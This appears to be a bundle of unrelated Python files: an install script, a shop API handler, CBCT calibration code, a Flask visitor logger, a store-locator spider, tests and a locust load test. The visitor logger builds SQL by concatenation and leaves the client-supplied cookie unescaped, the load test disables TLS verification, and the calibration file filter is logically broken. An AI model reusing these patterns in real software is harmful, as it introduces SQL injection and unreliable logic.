if len(sys.argv)==2:
simulate_nest_generator(sys.argv[1])
else:
print('missing argument')
|
import os
os.system("pip3 install proxyscrape")
os.system("cp proxygrab.py proxygrab")
os.system("chmod+x proxygrab")
os.system("mv proxygrab /usr/local/bin/")
print("file copied")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from core_backend import context
from core_backend.service import handler
from core_backend.libs import token as tk
from core_backend.libs.exception import Error
from server.domain.models import WechatshopShipper
import logging
import settings
logger = logging.getLogger(__name__)
class Handler(handler.handler):
""" 快递公司列表 """
def dispatch(self, session):
req_body = self.context.request.body
resp_body = self.context.response.body
name = req_body.params.name
page = req_body.params.page or 1
size = req_body.params.size or 10
limit = size
offset = (page - 1) * size
data = []
total = session.query(WechatshopShipper).count()
shipper_list = session.query(WechatshopShipper).order_by(WechatshopShipper.id.asc()).limit(limit).offset(offset).all()
data = [s.to_dict() for s in shipper_list]
resp_body.data = dict(
data=data,
currentPage=page,
count=total,
)
|
from datetime import datetime, timedelta
from pytz.tzinfo import StaticTzInfo
class OffsetTime(StaticTzInfo):
"""
A dumb timezone based on offset such as +0530, -0600, etc.
"""
def __init__(self, offset):
hours = int(offset[:3])
minutes = int(offset[0] + offset[3:])
self._utcoffset = timedelta(hours=hours, minutes=minutes)
def load_datetime(value, dt_format):
"""
Create timezone-aware datetime object
"""
if dt_format.endswith('%z'):
dt_format = dt_format[:-2]
offset = value[-5:]
value = value[:-5]
if offset != offset.replace(':', ''):
# strip : from HHMM if needed (isoformat() adds it between HH and MM)
offset = '+' + offset.replace(':', '')
value = value[:-1]
return OffsetTime(offset).localize(datetime.strptime(value, dt_format))
return datetime.strptime(value, dt_format)
|
"""Main module."""
import os
from datetime import datetime
import numpy as np
from scipy.optimize import least_squares
import click
import matplotlib.pyplot as plt
from geometric_calibration.reader import (
read_img_label_file,
read_projection_hnc,
read_projection_raw,
)
from geometric_calibration.utils import (
deg2rad,
angle2rotm,
get_grayscale_range,
create_camera_matrix,
project_camera_matrix,
drag_and_drop_bbs,
search_bbs_centroids,
)
def calibrate_cbct(projection_dir, bbs_3d, sad, sid):
"""Main CBCT Calibration routines.
:param projection_dir: path to directory containing .raw files
:type projection_dir: str
:param bbs_3d: array containing 3D coordinates of BBs
:type bbs_3d: numpy.array
:param sad: nominal source to isocenter (A) distance
:type sad: float
:param sid: nominal source to image distance
:type sid: float
:return: dictionary with calibration results
:rtype: dict
"""
# RCS: room coordinate system
# A: isocenter
# Read image labels
labels_file_path = os.path.join(projection_dir, "imgLabels.txt")
proj_file, angles = read_img_label_file(labels_file_path)
# Initialize output dictionary
results = {
"proj_angles": [],
"panel_orientation": [],
"sid": [],
"sad": [],
"isocenter": [],
"source": [],
"panel": [],
"img_center": [],
"err_init": [],
"err_final": [],
}
# Calibrate views
with click.progressbar(
iterable=range(len(angles)), fill_char="=", empty_char=" "
) as prog_bar:
for k in prog_bar:
proj_path = os.path.join(
projection_dir, proj_file[k]
) # path of the current image
if k == 0: # no indications other than nominal values
# Calibrate first view with drag and drop procedure
view_results = calibrate_projection(
proj_path,
bbs_3d,
sad=sad,
sid=sid,
angle=angles[k],
angle_offset=0,
img_dim=[1024, 768],
pixel_size=[0.388, 0.388],
search_area=7,
drag_and_drop=True,
)
else: # if not first iteration
# initialize geometry (based on previous optimization)
angle_offset = angles[k] - angles[k - 1]
image_center = view_results["img_center"]
# Calibrate other views without drag and drop procedure
view_results = calibrate_projection(
proj_path,
bbs_3d,
sad=sad,
sid=sid,
angle=angles[k - 1],
angle_offset=angle_offset,
img_dim=[1024, 768],
pixel_size=[0.388, 0.388],
search_area=7,
image_center=image_center,
drag_and_drop=False,
)
# Update output dictionary
results["proj_angles"].append(view_results["proj_angle"])
results["panel_orientation"].append(
view_results["panel_orientation"]
)
results["sid"].append(view_results["sid"])
results["sad"].append(view_results["sad"])
results["isocenter"].append(view_results["isocenter"])
results["source"].append(view_results["source"])
results["panel"].append(view_results["panel"])
results["img_center"].append(view_results["img_center"])
results["err_init"].append(view_results["err_init"])
results["err_final"].append(view_results["err_final"])
return results
def calibrate_2d(projection_dir, bbs_3d, sad, sid):
"""Main 2D Calibration routines.
:param projection_dir: path to directory containing .raw files
:type projection_dir: str
:param bbs_3d: array containing 3D coordinates of BBs
:type bbs_3d: numpy.array
:param sad: nominal source to isocenter (A) distance
:type sad: float
:param sid: nominal source to image distance
:type sid: float
:return: dictionary with calibration results
:rtype: dict
"""
# RCS: room coordinate system
# A: isocenter
# Find projection files in the current folder
proj_file = []
angles = []
for f in os.listdir(projection_dir):
if ("AP" or "RL") and (".raw" or ".hnc") in f:
proj_file.append(f)
if "AP" in f:
angles.append(0)
elif "RL" in f:
angles.append(90)
# Initialize output dictionary
results = {
"proj_angles": [],
"panel_orientation": [],
"sid": [],
"sad": [],
"isocenter": [],
"source": [],
"panel": [],
"img_center": [],
"err_init": [],
"err_final": [],
}
# Calibrate views
with click.progressbar(
iterable=range(len(angles)), fill_char="=", empty_char=" ",
) as prog_bar:
for k in prog_bar:
proj_path = os.path.join(
projection_dir, proj_file[k]
) # path of the current image
# Calibrate views with drag and drop procedure
view_results = calibrate_projection(
proj_path,
bbs_3d,
sad=sad,
sid=sid,
angle=angles[k],
angle_offset=0,
img_dim=[2048, 1536],
pixel_size=[0.388, 0.388],
search_area=14,
resolution_factor=2,
drag_and_drop=True,
)
# Update output dictionary
results["proj_angles"].append(view_results["proj_angle"])
results["panel_orientation"].append(
view_results["panel_orientation"]
)
results["sid"].append(view_results["sid"])
results["sad"].append(view_results["sad"])
results["isocenter"].append(view_results["isocenter"])
results["source"].append(view_results["source"])
results["panel"].append(view_results["panel"])
results["img_center"].append(view_results["img_center"])
results["err_init"].append(view_results["err_init"])
results["err_final"].append(view_results["err_final"])
return results
def calibrate_projection(
projection_file,
bbs_3d,
sad,
sid,
angle,
angle_offset=0,
img_dim=[1024, 768],
pixel_size=[0.388, 0.388],
search_area=7,
resolution_factor=1,
image_center=None,
drag_and_drop=True,
):
"""Calibration of a single projection.
:param projection_file: path to file
:type projection_file: str
:param bbs_3d: 3D coordinates of phantom's reference points
:type bbs_3d: numpy.array
:param sad: nominal source to isocenter (A) distance
:type sad: float
:param sid: nominal source to image distance
:type sid: float
:param angle: gantry angle for current projection
:type angle: float
:param angle_offset: angle offset for panel, defaults to 0
:type angle_offset: int, optional
:param img_dim: image dimensions in pixels, defaults to [1024, 768]
:type img_dim: list, optional
:param pixel_size: pixel dimensions in mm, defaults to [0.388, 0.388]
:type pixel_size: list, optional
:param search_area: dimension of reference point's searching area, defaults
to 7
:type search_area: int, optional
:param resolution_factor: resolution factor, when mode is "cbct" this
parameter equals to 1, in 2D mode is 2 (because resolution is doubled),
defaults to 1
:type resolution_factor: int, optional
:param image_center: [description], defaults to None
:type image_center: [type], optional
:param image_center: center of image, defaults to None
:type image_center: list, optional
:param drag_and_drop: whether or not perform Drag&Drop correction routines,
typically set to True for first projection. Defaults to True
:type drag_and_drop: bool, optional
:raises Exception: if less than 5 BBs centroids are recognized, optimizer
automatically fails since calibration can't be consider reliable
:return: dictionary with calibration results for current projection
:rtype: dict
"""
results = {}
if image_center is None: # in case image_center is not declared
image_center = [img_dim[1] / 2, img_dim[0] / 2]
isocenter = [0, 0, 0]
# panel orientation (from panel to brandis reference - rotation along y)
panel_orientation = np.array([0, deg2rad(angle), 0]) + np.array(
[0, deg2rad(angle_offset), 0]
)
# Load projection
if ".raw" in projection_file:
img = read_projection_raw(projection_file, img_dim)
elif ".hnc" in projection_file:
img = read_projection_hnc(projection_file, img_dim)
# Project points starting from extrinsic and intrinsic parameters
# generate proj_matrix (extrinsic and intrinsic parameters)
T = create_camera_matrix(panel_orientation, sid, sad, pixel_size, isocenter)
# projected coordinates of brandis on panel plane
r2d = project_camera_matrix(
bbs_3d, image_center, T, resolution_factor
) # 2d coordinates of reference points
grayscale_range = get_grayscale_range(img)
if drag_and_drop is True:
# Overlay reference bbs with projection
r2d_corrected = drag_and_drop_bbs(
projection_path=img,
bbs_projected=r2d,
grayscale_range=grayscale_range,
)
# Starting from the updated coordinates, define a search area around them
# and identify the bbs as black pixels inside these areas (brandis are used
# as probes)
if drag_and_drop is True:
bbs_centroid = search_bbs_centroids(
img=img,
ref_2d=r2d_corrected,
search_area=search_area,
dim_img=img_dim,
grayscale_range=grayscale_range,
)
else:
bbs_centroid = search_bbs_centroids(
img=img,
ref_2d=r2d,
search_area=search_area,
dim_img=img_dim,
grayscale_range=grayscale_range,
)
# Calibration - non linear data fitting optimization problem
index = np.where(~np.isnan(bbs_centroid[:, 0]))[0]
# Estimated BBs
bbs_estim_init = bbs_centroid[
~np.isnan(bbs_centroid).any(axis=1)
] # not consider if out of searching area
# Real Brandis BBs
bbs_real_init = bbs_3d[index, :]
# x0
parameters = np.append(panel_orientation, image_center).tolist()
parameters.append(sid)
parameters.append(sad)
# Boundaries
angle_limit = 0.05
sid_sad_limit = 1
low_bound = [
-angle_limit,
-np.pi,
-angle_limit,
0,
0,
sid - sid_sad_limit,
sad - sid_sad_limit,
]
up_bound = [
angle_limit,
np.pi,
angle_limit,
img_dim[1],
img_dim[0],
sid + sid_sad_limit,
sad + sid_sad_limit,
]
if index.shape[0] > 5: # at least 5 BBs
sol = least_squares(
fun=calibration_cost_function,
x0=parameters,
args=(bbs_real_init, pixel_size, bbs_estim_init, isocenter,),
method="trf",
bounds=(low_bound, up_bound)
# verbose=2,
)
sol = sol.x # Solution found
panel_orientation_new = np.array(sol[:3]) # New panel orientation
image_center_new = np.array(sol[3:5]) # New center of image
sid_new = sol[5]
sad_new = sol[6]
isocenter_new = isocenter
else:
raise Exception("Cannot properly process last projection. Please Retry")
# project based on calibration - use new panel orientation,
# tube and panel position
T = create_camera_matrix(
panel_orientation_new, sid_new, sad_new, pixel_size, isocenter_new
) # projected coordinates of brandis on panel plane
bbs_estim_final = project_camera_matrix(
bbs_3d, image_center_new, T
) # projected BBs (considering unknown)
# calculate improvement
err_init = bbs_estim_init - r2d[index, :] # estimated - projected
err_final = bbs_estim_init - bbs_estim_final[index, :]
err_init = np.mean(abs(err_init))
err_final = np.mean(abs(err_final))
# calculate new source/panel position
T_new = angle2rotm(
panel_orientation_new[0],
panel_orientation_new[1],
panel_orientation_new[2],
)
R_new = T_new[:3, :3]
source_new = (isocenter_new + (R_new * np.array([0, 0, sad_new])))[:, 2]
panel_new = (isocenter_new + (R_new * np.array([0, 0, sad_new - sid_new])))[
:, 2
]
# update with new value
results["proj_angle"] = angle
results["panel_orientation"] = panel_orientation_new
results["sid"] = sid_new
results["sad"] = sad_new
results["isocenter"] = isocenter_new
results["source"] = source_new
results["panel"] = panel_new
results["img_center"] = image_center_new
results["err_init"] = err_init
results["err_final"] = err_final
return results
def calibration_cost_function(param, bbs_3d, pixel_size, bbs_2d, isocenter):
"""Cost Function for calibration optimizers.
:param param: parameters to be optimized
:type param: list
:param bbs_3d: 3D coordinates of reference BBs
:type bbs_3d: numpy.array
:param pixel_size: pixel dimensions in mm
:type pixel_size: list
:param bbs_2d: 2D coordinates of BBs projected on the current image
:type bbs_2d: numpy.array
:param isocenter: coordinates of isocenter
:type isocenter: numpy.array
:return: cost function value to be minimized
:rtype: float
"""
# unknown
panel_orientation = np.array(param[:3])
img_center = np.array(param[3:5])
sid = np.array(param[5])
sad = np.array(param[6])
T = create_camera_matrix(
panel_orientation, sid, sad, pixel_size, isocenter
) # projected coordinates of brandis on panel plane
r2d = project_camera_matrix(
bbs_3d, img_center, T
) # projected bbs (considering unknown)
delta = r2d - bbs_2d # Error
diff = np.square(delta[:, 0]) + np.square(
delta[:, 1]
) # consider both directions
return diff
def plot_calibration_results(calib_results):
"""Plot source/panel position after calibration.
:param calib_results: dictionary containing results of a calibration
:type calib_results: dict
"""
source_pos = np.array(calib_results["source"])
panel_pos = np.array(calib_results["panel"])
isocenter = np.array(calib_results["isocenter"])
def on_key_pressed(event):
if event.key == "enter":
plt.close()
# Plot panel and source positions (trajectory)
fig = plt.figure(num="Source/Panel Position")
fig.canvas.mpl_connect("key_press_event", on_key_pressed)
ax = fig.add_subplot(111, projection="3d")
ax.scatter(
source_pos[:, 0],
source_pos[:, 1],
source_pos[:, 2],
marker=".",
c="g",
label="Source Position",
)
ax.scatter(
panel_pos[:, 0],
panel_pos[:, 1],
panel_pos[:, 2],
marker=".",
c="r",
label="Panel Position",
)
ax.scatter(
isocenter[0, 0],
isocenter[0, 1],
isocenter[0, 2],
marker=".",
c="b",
label="Isocenter Position",
)
plt.title("Panel/Source position after calibration\nPress Enter to close")
ax.set_xlabel("X Label [mm]")
ax.set_ylabel("Y Label [mm]")
ax.set_zlabel("Z Label [mm]")
fig.legend(loc="lower right")
plt.show()
def save_lut(path, calib_results, mode):
"""Save LUT file for a calibration.
:param path: path to .raw file directory, where LUT will be saved
:type path: str
:param calib_results: dictionary containing results for a calibration
:type calib_results: dict
:param calib_results: acquisition modality for calibration
:type calib_results: string
"""
angles = calib_results["proj_angles"]
panel_orientation = calib_results["panel_orientation"]
image_center = calib_results["img_center"]
sid = calib_results["sid"]
sad = calib_results["sad"]
clock = datetime.now()
if mode == "cbct":
filename = "CBCT_LUT_{}_{:02}_{:02}-{:02}_{:02}.txt".format(
clock.year, clock.month, clock.day, clock.hour, clock.minute,
)
elif mode == "2d":
filename = "2D_LUT_{}_{:02}_{:02}-{:02}_{:02}.txt".format(
clock.year, clock.month, clock.day, clock.hour, clock.minute,
)
output_file = os.path.join(path, filename)
with open(output_file, "w") as res_file:
res_file.write(f"#Look Up Table for {mode.upper()} reconstruction\n")
res_file.write(
"#Angle (deg) | Panel Orientation(rad) [X Y Z] | Image_center(pixel) X Y | SID(mm) | SAD(mm)\n"
)
res_file.write(
"#Date:{}_{}_{}_Time:{}_{}_{}.{}\n".format(
clock.year,
clock.month,
clock.day,
clock.hour,
clock.minute,
clock.second,
clock.microsecond,
)
)
res_file.write("#\n")
res_file.write("# --> END OF HEADER. FIXED SIZE: 5 lines. \n")
for k in range(len(angles)):
res_file.write(
"{:6.12f} {:6.12f} {:6.12f} {:6.12f} {:6.12f} {:6.12f} {:6.12f} {:6.12f}\n".format(
angles[k],
panel_orientation[k][0],
panel_orientation[k][1],
panel_orientation[k][2],
image_center[k][0],
image_center[k][1],
sid[k],
sad[k],
)
)
res_file.write(
r"# END OF FILE. REQUIRED TO ENSURE '\n' at the end of last calibration line. NO MORE LINES AFTER THIS!!!"
)
|
from flask import request, make_response
import time
import datetime
import calendar
from user_agents import parse
import random
import string
import pymysql
import json
from ast import literal_eval
from secrets import secrets
sql_host = secrets['sql']['host']
sql_port = secrets['sql']['port']
sql_username = secrets['sql']['username']
sql_password = secrets['sql']['password']
sql_db = secrets['sql']['db']
sql_table = secrets['sql']['table']
# this function looks to see if the visitor has a cookie.
# if the visitor has a cookie it will return the webpage.
# if the visitor does not have a cookie it will make one and return the webpage.
# will call log_visit to log the visit of the visitor.
def set_cookie(html):
cookie = request.cookies.get('x')
domain = request.host
# calulates epcohtime using utc time for consistency incase server and local time are different
date_now = datetime.datetime.utcnow()
epoch_time = str(round(calendar.timegm(date_now.timetuple())))
if cookie != None:
resp = html
else:
randomchars = ''.join(
[random.choice(string.ascii_letters + string.digits) for n in range(32)])
cookie = epoch_time + randomchars
resp = make_response(html)
resp.set_cookie("x", cookie, domain=domain, httponly=True)
log_visit(cookie, epoch_time, domain)
return resp
def log_visit(cookie, epoch_time, domain):
if domain in request.url:
db = pymysql.connect(host=sql_host, port=sql_port,
user=sql_username, passwd=sql_password, db=sql_db)
c = db.cursor()
# escape fields to prevent sql injection
# note that when you use .escape it puts ' ' around the variable so ' ' is not required in the sql statement
user_agent = db.escape(request.user_agent.string)
referer = db.escape(request.headers.get("Referer"))
url = db.escape(request.url)
visitorip = request.remote_addr
c.execute("INSERT INTO " + sql_table + " (USER_AGENT, REFERER, URL, IP, EPOCHTIME, COOKIE) VALUES(" + user_agent +
", " + referer + ", " + url + ", '" + visitorip + "', '" + epoch_time + "', '" + cookie + "');")
db.commit()
db.close()
message = 'Visit added to the database.'
else:
message = 'Site domain is not in the url. Not adding visit to the database.'
return json.dumps({'message': message})
def return_epoch_time(num_days):
# calulates epcohtime using utc time for consistency incase server and local time are different
date_now = datetime.datetime.utcnow()
epoch_time_now = calendar.timegm(date_now.timetuple())
epoch_time_x_days_ago = str(round(epoch_time_now - num_days * 86400))
return epoch_time_x_days_ago
def get_data_from_table(query):
# get data from table and if num_days is not 0 then use it as a filter
# return a list to the user
db = pymysql.connect(host=sql_host, port=sql_port,
user=sql_username, passwd=sql_password, db=sql_db)
c = db.cursor()
sqlquery = query + ';'
try:
c.execute(sqlquery)
data = c.fetchall()
except:
data = "Failed to gather data for your query."
db.close()
return str(data)
# Get the number of unique ip addresses.
# Call get_total_num_unique_ips(0) for all time unique visits by ip.
# Call get_total_num_unique_ips(1) to get unique number of ips for one visit.
def get_total_num_unique_ips(num_days):
query = 'SELECT COUNT(DISTINCT IP) AS x FROM ' + sql_table
if num_days != 0:
query = query + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days)
num_ips = get_data_from_table(query)
return num_ips[2:-4]
# Get the number of unique visits by cookie.
# Call get_total_num_unique_cookies(0) for all time unique visits by cookies.
# Call get_total_num_unique_cookies(1) to get unique number cookies.
def get_total_num_unique_cookies(num_days):
query = 'SELECT COUNT(DISTINCT COOKIE) AS x FROM ' + sql_table
if num_days != 0:
query = query + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days)
num_cookies = get_data_from_table(query)
return num_cookies[2:-4]
def listify(string):
# strip unneeded ( and )
string = string[1:-1]
string = '[' + string + ']'
string = literal_eval(string)
return string
def get_unique_ip_addresses(num_days):
# list unique ip addresses
query = 'SELECT DISTINCT IP FROM ' + sql_table
if num_days != 0:
query = query + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days)
list_of_ips = get_data_from_table(query)
return listify(list_of_ips)
def get_unique_urls(num_days):
# list unique ip addresses
query = 'SELECT URL, COUNT(*) AS "#" FROM ' + \
sql_table + ' GROUP BY URL ORDER BY 2'
if num_days != 0:
query = 'SELECT URL, COUNT(*) AS "#" FROM ' + sql_table + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days) + ' GROUP BY URL ORDER BY 2'
list_of_urls = get_data_from_table(query)
return listify(list_of_urls)
def get_unique_user_agents(num_days):
# list unique ip addresses
query = 'SELECT user_agent, COUNT(*) AS "#" FROM ' + \
sql_table + ' GROUP BY user_agent ORDER BY 2'
if num_days != 0:
query = 'SELECT user_agent, COUNT(*) AS "#" FROM ' + sql_table + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days) + ' GROUP BY user_agent ORDER BY 2'
list_user_agents = get_data_from_table(query)
return listify(list_user_agents)
def get_unique_referers(num_days):
# list unique ip addresses
query = 'SELECT REFERER, COUNT(*) AS "#" FROM ' + \
sql_table + ' GROUP BY REFERER ORDER BY 2'
if num_days != 0:
query = 'SELECT REFERER, COUNT(*) AS "#" FROM ' + sql_table + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days) + ' GROUP BY REFERER ORDER BY 2'
list_referers = get_data_from_table(query)
return listify(list_referers)
def get_unique_cookies_chart_data():
db = pymysql.connect(host=sql_host, port=sql_port,
user=sql_username, passwd=sql_password, db=sql_db)
c = db.cursor()
# http://stackoverflow.com/questions/11743019/convert-python-datetime-to-epoch-with-strftime
# calulates epcohtime using utc time for consistency incase server and local time are different
date_now = datetime.datetime.utcnow()
epoch_time_now = calendar.timegm(date_now.timetuple())
yesterday_midnight = datetime.datetime(
date_now.year, date_now.month, date_now.day, 0, 0)
epoch_yesterday_midnight = calendar.timegm(yesterday_midnight.timetuple())
epoch_midnight_1day_ago = epoch_yesterday_midnight - 86400
epoch_midnight_2day_ago = epoch_yesterday_midnight - 2 * 86400
epoch_midnight_3day_ago = epoch_yesterday_midnight - 3 * 86400
epoch_midnight_4day_ago = epoch_yesterday_midnight - 4 * 86400
epoch_midnight_5day_ago = epoch_yesterday_midnight - 5 * 86400
epoch_midnight_6day_ago = epoch_yesterday_midnight - 6 * 86400
epoch_midnight_7day_ago = epoch_yesterday_midnight - 7 * 86400
# WTF is going on with this sql query?
# needs organized.
# are we getting today yesterday, 2 days ago, etc correctly?
# why are they "AS" names not correct.
#
sqlquery = """SELECT COUNT(DISTINCT COOKIE) AS TODAY FROM """ + sql_table + """ WHERE EPOCHTIME > """ + str(epoch_yesterday_midnight) + \
""" UNION ALL SELECT COUNT(DISTINCT COOKIE) AS YDAY FROM """ + sql_table + """ WHERE EPOCHTIME < """ + str(epoch_yesterday_midnight) + """ AND EPOCHTIME > """ + str(epoch_midnight_1day_ago) + \
""" UNION ALL SELECT COUNT(DISTINCT COOKIE) AS YESTERDAY FROM """ + sql_table + """ WHERE EPOCHTIME < """ + str(epoch_midnight_1day_ago) + """ AND EPOCHTIME > """ + str(epoch_midnight_2day_ago) + \
""" UNION ALL SELECT COUNT(DISTINCT COOKIE) AS TWODAYSAGO FROM """ + sql_table + """ WHERE EPOCHTIME < """ + str(epoch_midnight_2day_ago) + """ AND EPOCHTIME > """ + str(epoch_midnight_3day_ago) + \
""" UNION ALL SELECT COUNT(DISTINCT COOKIE) AS THREEDAYSAGO FROM """ + sql_table + """ WHERE EPOCHTIME < """ + str(epoch_midnight_3day_ago) + """ AND EPOCHTIME > """ + str(epoch_midnight_4day_ago) + \
""" UNION ALL SELECT COUNT(DISTINCT COOKIE) AS FOURDAYSAGO FROM """ + sql_table + """ WHERE EPOCHTIME < """ + str(epoch_midnight_4day_ago) + """ AND EPOCHTIME > """ + str(epoch_midnight_5day_ago) + \
""" UNION ALL SELECT COUNT(DISTINCT COOKIE) AS FIVEDAYSAGO FROM """ + sql_table + """ WHERE EPOCHTIME < """ + str(epoch_midnight_5day_ago) + """ AND EPOCHTIME > """ + str(epoch_midnight_6day_ago) + \
""" UNION ALL SELECT COUNT(DISTINCT COOKIE) AS SIXDAYSAGO FROM """ + sql_table + """ WHERE EPOCHTIME < """ + str(
epoch_midnight_6day_ago) + """ AND EPOCHTIME > """ + str(epoch_midnight_7day_ago) + """;"""
try:
c.execute(sqlquery)
data = c.fetchall()
data_list = listify(str(data))
unique_cookies_chart_data = []
for tuple in data_list:
unique_cookies_chart_data.append(str(tuple[0]))
unique_cookies_chart_data = str(unique_cookies_chart_data)
except:
unique_cookies_chart_data = "Failed to gather the unique cookies chart data."
db.close()
return unique_cookies_chart_data
|
# -*- coding: utf-8 -*-
import json
import scrapy
from locations.items import GeojsonPointItem
class SuperdrugSpider(scrapy.Spider):
name = "superdrug"
item_attributes = {"brand": "Superdrug", "brand_wikidata": "Q7643261"}
allowed_domains = ["superdrug.com"]
download_delay = 0.5
start_urls = ["https://www.superdrug.com/stores/a-to-z"]
def parse(self, response):
urls = response.xpath('//a[@class="row store-link"]/@href').extract()
for url in urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_location)
def parse_location(self, response):
data = json.loads(
response.xpath(
'//script[@type="application/ld+json" and contains(text(), "streetAddress")]/text()'
).extract_first()
)
properties = {
"name": data["name"],
"ref": data["name"],
"addr_full": data["address"]["streetAddress"],
"city": data["address"]["addressLocality"],
"state": data["address"]["addressRegion"],
"postcode": data["address"]["postalCode"],
"country": data["address"]["addressCountry"],
"phone": data.get("telephone"),
"website": response.url,
"lat": float(
response.xpath(
'//div[@class="store-locator store-locator__overview"]/@data-lat'
).extract_first()
),
"lon": float(
response.xpath(
'//div[@class="store-locator store-locator__overview"]/@data-lng'
).extract_first()
),
}
yield GeojsonPointItem(**properties)
|
import numpy as np
from pandas import DataFrame, Series, period_range
import pandas._testing as tm
class TestAsFreq:
# TODO: de-duplicate/parametrize or move DataFrame test
def test_asfreq_ts(self):
index = period_range(freq="A", start="1/1/2001", end="12/31/2010")
ts = Series(np.random.randn(len(index)), index=index)
df = DataFrame(np.random.randn(len(index), 3), index=index)
result = ts.asfreq("D", how="end")
df_result = df.asfreq("D", how="end")
exp_index = index.asfreq("D", how="end")
assert len(result) == len(ts)
tm.assert_index_equal(result.index, exp_index)
tm.assert_index_equal(df_result.index, exp_index)
result = ts.asfreq("D", how="start")
assert len(result) == len(ts)
tm.assert_index_equal(result.index, index.asfreq("D", how="start"))
|
import os
import logging
import tempfile
import pytest
from nondjango.storages import utils, files, storages
logging.getLogger('boto3').setLevel(logging.ERROR)
logging.getLogger('botocore').setLevel(logging.ERROR)
logging.getLogger('s3transfer').setLevel(logging.ERROR)
def test_prepare_empty_path():
utils.prepare_path('')
def test_filesystem_storages_honor_workdir():
storage = storages.TemporaryFilesystemStorage()
filename = 'test_file.txt'
f = storage.open(filename, 'w+')
f.write('test payload')
f.close()
workdir = storage._workdir
assert filename in os.listdir(workdir), 'File is not on the storage workdir'
@pytest.mark.parametrize("storage_class, storage_params", [
(storages.TemporaryFilesystemStorage, {}),
(storages.S3Storage, {'workdir': 's3://gn-ninja/storage-test/'}),
])
def test_file_read_write(storage_class, storage_params):
payload = 'test payload'
storage = storage_class(**storage_params)
try:
storage.delete('test_file.txt')
except NotImplementedError:
raise
except Exception:
pass
assert not storage.exists('test_file.txt')
with storage.open('test_file.txt', 'w+') as f:
f.write(payload)
assert storage.exists('test_file.txt')
with storage.open('test_file.txt', 'r') as f2:
assert f2.read() == payload
|
import json
import random
import requests
from config import DataSets
from locust import HttpUser, SequentialTaskSet, task, between, TaskSet
from locust.clients import HttpSession
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import server.tests.decode_fbs as decode_fbs
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
"""
Simple locust stress test definition for cellxgene
"""
API_SUFFIX = "api/v0.2"
class CellXGeneTasks(TaskSet):
"""
Simulate use against a single dataset
"""
def on_start(self):
self.client.verify = False
self.dataset = random.choice(DataSets)
with self.client.get(
f"{self.dataset}/{API_SUFFIX}/schema", stream=True, catch_response=True
) as schema_response:
if schema_response.status_code == 200:
self.schema = schema_response.json()["schema"]
else:
self.schema = None
with self.client.get(
f"{self.dataset}/{API_SUFFIX}/config", stream=True, catch_response=True
) as config_response:
if config_response.status_code == 200:
self.config = config_response.json()["config"]
else:
self.config = None
with self.client.get(
f"{self.dataset}/{API_SUFFIX}/annotations/var?annotation-name={self.var_index_name()}",
headers={"Accept": "application/octet-stream"},
catch_response=True,
) as var_index_response:
if var_index_response.status_code == 200:
df = decode_fbs.decode_matrix_FBS(var_index_response.content)
gene_names_idx = df["col_idx"].index(self.var_index_name())
self.gene_names = df["columns"][gene_names_idx]
else:
self.gene_names = []
def var_index_name(self):
if self.schema is not None:
return self.schema["annotations"]["var"]["index"]
return None
def obs_annotation_names(self):
if self.schema is not None:
return [col["name"] for col in self.schema["annotations"]["obs"]["columns"]]
return []
def layout_names(self):
if self.schema is not None:
return [layout["name"] for layout in self.schema["layout"]["obs"]]
else:
return []
@task(2)
class InitializeClient(SequentialTaskSet):
"""
Initial loading of cellxgene - when the user hits the main route.
Currently this sequence skips some of the static assets, which are quite small and should be served by the
HTTP server directly.
1. Load index.html, etc.
2. Concurrently load /config, /schema
3. Concurrently load /layout/obs, /annotations/var?annotation-name=<the index>
-- Does initial render --
4. Concurrently load all /annotations/obs and all /layouts/obs
-- Fully initialized --
"""
# Users hit all of the init routes as fast as they can, subject to the ordering constraints and network latency.
wait_time = between(0.01, 0.1)
def on_start(self):
self.dataset = self.parent.dataset
self.client.verify = False
self.api_less_client = HttpSession(
base_url=self.client.base_url.replace("api.", "").replace("cellxgene/", ""),
request_success=self.client.request_success,
request_failure=self.client.request_failure,
)
@task
def index(self):
self.api_less_client.get(f"{self.dataset}", stream=True)
@task
def loadConfigAndSchema(self):
self.client.get(f"{self.dataset}/{API_SUFFIX}/schema", stream=True, catch_response=True)
self.client.get(f"{self.dataset}/{API_SUFFIX}/config", stream=True, catch_response=True)
@task
def loadBootstrapData(self):
self.client.get(
f"{self.dataset}/{API_SUFFIX}/layout/obs", headers={"Accept": "application/octet-stream"}, stream=True
)
self.client.get(
f"{self.dataset}/{API_SUFFIX}/annotations/var?annotation-name={self.parent.var_index_name()}",
headers={"Accept": "application/octet-stream"},
catch_response=True,
)
@task
def loadObsAnnotationsAndLayouts(self):
obs_names = self.parent.obs_annotation_names()
for name in obs_names:
self.client.get(
f"{self.dataset}/{API_SUFFIX}/annotations/obs?annotation-name={name}",
headers={"Accept": "application/octet-stream"},
stream=True,
)
layouts = self.parent.layout_names()
for name in layouts:
self.client.get(
f"{self.dataset}/{API_SUFFIX}/annotations/obs?layout-name={name}",
headers={"Accept": "application/octet-stream"},
stream=True,
)
@task
def done(self):
self.interrupt()
@task(1)
def load_expression(self):
"""
Simulate user occasionally loading some expression data for a gene
"""
gene_name = random.choice(self.gene_names)
filter = {"filter": {"var": {"annotation_value": [{"name": self.var_index_name(), "values": [gene_name]}]}}}
self.client.put(
f"{self.dataset}/{API_SUFFIX}/data/var",
data=json.dumps(filter),
headers={"Content-Type": "application/json", "Accept": "application/octet-stream"},
stream=True,
).close()
class CellxgeneUser(HttpUser):
tasks = [CellXGeneTasks]
# Most ops do not require back-end interaction, so slow cadence for users
wait_time = between(10, 60)
|
#!/usr/bin/python
# -------------------------------------
# Description:
# Arguments:
# Author: Victor Marot (University of Bristol)
# -------------------------------------
import os
import traceback
import sys
import pandas as pd
import numpy as np
import re
import argparse
import tkinter
|
# Copyright 2012-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
